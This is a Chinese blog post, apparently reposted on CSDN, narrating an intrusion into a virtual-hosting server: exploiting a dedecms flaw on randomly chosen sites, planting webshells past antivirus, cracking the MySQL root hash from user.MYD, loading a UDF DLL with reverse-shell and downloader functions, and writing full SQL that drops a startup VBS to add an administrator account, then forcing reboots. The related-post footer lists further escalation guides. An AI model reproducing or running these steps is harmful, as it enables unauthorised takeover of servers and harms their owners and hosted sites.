mysql提权入侵服务器_Mysql提权拿服务器

最新推荐文章于 2022-11-16 14:47:02 发布
最新推荐文章于 2022-11-16 14:47:02 发布
阅读量484 收藏 1
点赞数
文章标签: mysql提权入侵服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39606911/article/details/113610867
版权

最新dedecms出了漏洞。

很常规就找几个站日日。dedecms为主流了

有这么些常规的Oday日起站来容易。

很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。

b42e5642c02366af4bcb4da138af26dd.png

接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。这次提着试试。权限很小。

一般mysql提权我先是看站是不是mysql的。然后找配置文件看下。看连接数据库能有mysql的权限不。

dedecms一般都在data目录下的这个文件记录数据库信息。

7e578dd803251473b8cda9c747494a81.png

然后菜刀配置连接

b1b1c1d8fa20dfb1af20a90d408339fc.png

这次没有那么运气。当然。在虚拟主机我以前遇见过一次。八十多个站的。zkeys的虚拟主机。

不行。

就不上尝试mysql提权了。

接着先上asp大马

7d3f56390df29e36af938cd99fd4b0ab.png

。很常规的去看组件和脚本。

c260e561f039feb73b214048df2714f3.png

不支持aspx。

好吧。一场恶战。

接着就是看组件了

0131c16dd2352fe051dfc39f3afa5bab.png

尼玛啊。四个都禁用了。禁用你妹啊。

接着大马翻目录啊。

找可以利用的吧。

由于权限小。没什么可以翻的。

就找到了一个c:\program files\的目录。不可写。但是可以读。所有子目录都可以。

6b45d389bb953471ffa668b3a547de5d.png

不过里面都翻了。还是没什么。

不可写。lpk也不行。

接着就继续。

d7eb565a94822937185ad443a5e50938.png

发现这个。尼玛啊。天地良心。看到了mysql。果断点击进去

e2aa3898bb7c1c4a8ffcd90bb994dbe8.png

把文件下载本地。

然后是不可以用txt什么的编辑的。

我就用下好压。接着用里面自带的内部查看器。看到了路径

PS: 其实用普通的mysql账号连接数据库后执行 show variables like '%datadir%'; 就可以看到数据库路径

fd4a4036b40ab3ce807467b44c3e3b34.png

好了。不喜欢用大马提权。转战菜刀

55694769149a0282fca21e3de440c169.png

心突然一灰。

接着docs

072409fdac82dde6e81b8f606ff1592f.png

我操可以访问。不是继承性的目录权限。

接着果断mysql\data\

8c8cccab48948349f48dd31f0fee65a4.png

卧槽。亮瞎了我的钛合金狗眼。你看这是神马?

还有mysql的目录权限啊。

果断下载user.myd

f1460752f36947883e66cff77f35f584.png

尼玛四十位的有木有啊。现在这样子懒得我去组合了啊啊啊啊。狗屎运啊。

上cmd5解密

21bf32e15f89879cdaad115ea0d1214d.png

菜刀配置去鸟。

a9766a9905771712008c3fcc45712302.png

温馨感有木有。

看版本咯

select version();

222405a071505fe53329b8957bec4594.png

5.0啊有木有。不需要导安装目录了。

上udf导出创建函数

061edb5a20bc26dd62e405b1330e9ecb.png

~~~~~~~~~~~~~~~~~~~~~北极大黑阔的分界线~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

downloader 下载者,到网上下载指定文件并保存到指定目录;

open3389 通用开3389终端服务,可指定端口(不改端口无需重启);

backshell 反弹Shell;

ProcessView 枚举系统进程;

KillProcess 终止指定进程;

regread 读注册表;

regwrite 写注册表;

shut 关机,注销,重启;

about 说明与帮助函数;

~~~~~~~~~~~~~~~~~~~~~北极大黑阔的分界线~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cmdshell创建了。很高兴。

可是。尼玛

b37eec23e4aededf05da0d83a8139881.png

什么情况??之前遇到一个5.5也发生了。卧槽。。

不过可以创建函数。我就写入启动项提权了

3289160e7b21a7c2f0ca7d7779ecc21e.png

创建过程不截图了。

连接mysql数据库后执行

create table a (cmd text);

创建a表列名cmd并写入文本

insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators 1 /add"",0) " );

这是接下来一个一个执行的

建立好列并写入数据了。接着就是导出了。

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\这个是启动目录。

接着select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs"跟着别的大黑阔的。

在菜刀不可以这样子执行。而我是在udf.php里面执行的

然后udf创建shut函数

执行。

create function shut returns string soname 'udf.dll'

f1569cc24dd4d5a4079bb86a1561bc89.png

创建了。

接下来关机

select shut ("shutdown")

等管理开机就建立账号了。

接着一个中午过去了。

尼玛。看不了端口。用工具一扫端口就封IP。asp大马没权限读。不能执行命令根本看不鸟。aspx不支持。尼玛要是支持直接读注册表。

接着纠结一会。想到了。

49dd2e5d75e58bb7df45304ba5ac0017.png

用mysql写入文件到启动项。

netstat -ano 显示所有开放端口 > 导出到c:\windows\temp\fuck.txt文本。

接着继续select shut ("shutdown")

我又关机了。接着等到刚才。

重新上shell

e2aa3898bb7c1c4a8ffcd90bb994dbe8.png

接着打开

8087574ab74be443623a3d18990b5e43.png

接着

438a7069497bcffd32f76a4ccbd375c0.png

V3eY4原创.QQ:649120659.转载请注明出处。

尼玛文章不容易啊。就这么过了一个小时?

weixin_39606911
关注
MySQL提权总结(建议收藏)
xj28555的博客
09-08 742
原文地址:https://www.cnblogs.com/sfsec/p/15241860.html 前言 数据库权限 在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限 口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经
服务器关于MySQL中udf.dll 提权入侵处理方法
CShouziwangDN的博客
04-18 367
处理服务器关于MySQL中udf.dll 提权入侵处理方法 首先在服务器桌面创建一个.TXT文件,名称随意,然后复制下面代码保存,最后修改.txt的扩展名为.bat文件,双击运行.bat文件即可。 批处理代码: net stop mysql del %SystemRoot%\system32\udf.dll /A/F/Q del %SystemRoot%\udf.dll /A/F/Q del %SystemRoot%\temp\udf.dll /A/F/Q dir %SystemRoot%\system32
3306-批量Mysql提权,3306端口:手动入侵mysql写入启动项提权
weixin_35702533的博客
03-12 584
1、连接到对方MYSQL 服务器。首先你要下载phpnow百度有下载下来然后解压到C盘根目录,找到MySQL-5.1.50这个文件夹,再打开bin文件夹1、打开本地cmd命令提示框,输入命令cd C:\MySQL-5.1.50\bin 意思就是进入当前目录。然后就可以输入mysql命令了。然后输入:mysql -u 目标用户名,3306默认是root -h 目标ip地址 -p 回车例如:mys...
mysql 5.0 入侵_mysql5.0入侵测试以及防范方法分享
weixin_35182280的博客
02-17 142
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:代码如下:grant all privileges on *.* to...
旁注时MYSQL+root权限提权******服务器
weixin_34128411的博客
01-10 142
1.得到webshell或者能远程连接服务器mysql(root)密码,这是以下所有步骤的基础; 2.上传一个su.php,百度搜搜看,好像还有人写了一个叫做“mysql后门自动安装工具”的东西; 3.用得到的root密码填入到su.php,然后导出udf.dll; 这里说几个细节,确定你要***的服务器系统类型,一般是windows 2000或者2003吧?200...
一次服务器入侵的处理过程分享
「 虚幻私塾」
08-31 517
在 Linux 操作系统的动态链接库加载过程中,动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库,LD_PRELOAD 环境变量和 /etc/ld.so.preload 配置文件中指定的动态链接库依然会被装载,它们的优先级比 LD_LIBRARY_PATH 环境变量所定义的链接库查找路径的文件优先级要高,所以能够提前于用户调用的动态库载入。,我在生活和现实面前低头了。...
mysql入侵服务器_记通过mysql数据库成功入侵服务器内部的渗透实战
weixin_33127399的博客
01-19 1250
1,在成功进入mysql到数据库之后,可以使用select user();命令,查看当前的用户,如果为root,则可以执行下一步操作。不为root,则需要通过其他方法提权。2, 使用show variables like '%log%'及show variables like '%secure%'查看相应的日志模块和安全防御模块的开启情况。并且了解网站目录的相应的路径情况,如果没有开启,则使用下面...
提权服务器(实战).wmv
10-12
在IT行业中,提权是一种非常重要的安全概念,特别是在服务器管理和网络安全方面。提权指的是攻击者通过发现系统漏洞或利用不安全的配置,从一个低权限账户获取到更高权限的过程。这个过程可以允许攻击者对系统进行更...
linux入侵提权(服务器提权)方法.docx
09-26
【Linux入侵提权方法】 在Linux环境中,当攻击者获得了有限的系统权限后,往往寻求进一步提升至root权限,以获得对服务器的完全控制。本文将介绍两种常见的Linux提权方法:利用MySQL进行提权以及低权限用户的提权...
护卫神mysql提权_护卫神主机大师提权漏洞利用分析
weixin_32534653的博客
01-27 392
*本文原创作者:Freedom,本文属FreeBuf原创奖励计划,未经许可禁止转载0x01 前言护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神...
MySQL_Exploit.rar_0day_C 0day_Exploit_mysql c
09-22
标签中的"mysql__c"进一步强调了这个漏洞与MySQL数据库和C语言的关联,可能表示该exploit是针对MySQL服务器的,且利用的是C语言实现的攻击代码。 虽然具体的技术细节未在文件名称或描述中给出,但可以推测以下知识...
Mysql提权服务器
jiazhipeng12的专栏
12-08 436
记一次比较艰难奇葩的mysql提权。最新dedecms出了漏洞。很常规就找几个站日日。dedecms为主流了有这么些常规的Oday日起站来容易。很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。这次提着试试。权限很小。一般mysql提权我先是看站是不是mysql的。然后找配置文件看下。看连接数...
linux mysql 入侵_MySql入侵测试以及防范
weixin_39725403的博客
01-19 196
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:1 grant all privileges on *.* to 数据...
通过mysql入侵win主机_通过mysql入侵NT和win2000
weixin_28956181的博客
02-05 116
通过mysql入侵NT和win2000作者:网络 来源:佚名 更新时间:2008-02-08 13:09:04点击:0by coolweiscoolweis@netguard.com.cn许多nt和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空,这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码,而iis的一些其他漏洞导致源代码泄漏也可能看到...
mysql提权服务器,Linux利用UDF库实现Mysql提权
weixin_35834213的博客
03-18 129
环境:os:linux(bt5)database:mysql简述:通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。要求:在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令1,得到插件库路径?...
通过mysql命令 入侵_通过mysql入侵全过程.doc
weixin_29322049的博客
01-19 360
您所在位置:网站首页 > 海量文档&nbsp>&nbsp计算机&nbsp>&nbspPHP资料通过mysql入侵全过程.doc7页本文档一共被下载:次,您可全文免费在线阅读后下载本文档。 下载提示1.本站不保证该用户上传的文档完整性,不预览、不比对内容而直接下载产生的反悔问题本站不予受理。2.该文档所得收入(下载+...
记一次mysql数据库被入侵
最新发布
hehehehao1的博客
11-16 316
mysql数据库被盗
MySQL数据库入侵及防御方法
weixin_33812433的博客
07-16 547
来自:http://blog.51cto.com/simeon/1981572 作者介绍 陈小兵,高级工程师,具有丰富的信息系统项目经验及18年以上网络安全经验,现主要从事网络安全及数据库技术研究工作。《黑客攻防及实战案例解析》《Web渗透及实战案例解析》《安全之路-Web渗透及实战案例解析第二版》《黑客攻防实战加密与解密》《网络攻防实战研究:漏洞利用与提权》作者,在国内多本学术期...
mysql 入侵_看紧你的3306端口,一次通过mysql入侵_mysql
weixin_39886238的博客
01-18 439
用superscan扫了一下某个c类的网段,寻找开放80端口的机器,结果就只有一台机器开放了80端口,试着连了一下,是我们学校某个社团的的主页。从端口的banner来看应该是apache(win32),证实一下telnet 211.87.xxx.xxxget(回车)http://www.gaodaima.com/38908.html看紧你的3306端口,一次通过mysql入侵_mysql501 ...
Hzhost主机提权思路与技巧分析
"这篇文章是关于黑客入侵提权技术的总结,特别是针对Hzhost主机的。作者分享了在提权过程中的策略和一些实用工具,包括信息收集、判断服务器配置和利用潜在漏洞的方法。" 文章内容详述: 1. Hzhost主机定位: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值